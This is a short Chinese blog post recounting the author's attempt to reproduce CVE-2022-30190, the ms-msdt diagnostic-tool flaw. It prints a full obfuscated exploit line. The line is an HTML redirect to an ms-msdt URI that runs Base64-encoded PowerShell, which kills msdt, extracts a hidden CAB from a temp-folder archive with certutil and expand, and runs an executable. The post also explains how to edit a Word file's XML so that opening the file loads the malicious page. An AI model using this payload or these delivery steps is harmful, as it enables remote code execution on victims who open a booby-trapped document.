本文探讨了CVE-2022-30190漏洞,该漏洞涉及通过恶意HTML文件和Word文档触发的代码执行。攻击者利用改进的POC,通过诊断疑难解答协议和Base64编码的恶意代码来操纵服务器上的文件。受害者在打开特定的Word文档后,会被引导至恶意网站,从而执行攻击者的代码。
cve-2022-30190
今天上高数课刷b站,刷到cve-2022-30190复现的视频。自己就搜了一下资料
主要是这两个改进后的poc和样本介绍。
折腾很久,结果就是这个poc在很多版本都用不了,或者说这个漏洞局限性比较大。
中间过程也看了样本介绍文章作者(研究员)的推文什么的,这个上面的poc应该是根据研究员的poc改进得到的。
实现攻击需要:服务器上提供一个html文件和给被攻击者一个word文件
下面是html文件的关键
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
开头这个是打开诊断疑难解答向导的协议
类似的有打开pdf的协议
html代码中间的经过base64编码的就是恶意代码,就是访问这个网站,再跳转到链接执行代码。
把word文件解压把里面的一个xml文件加一个指向恶意网站的代码,打开word就可以访问恶意网站了。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
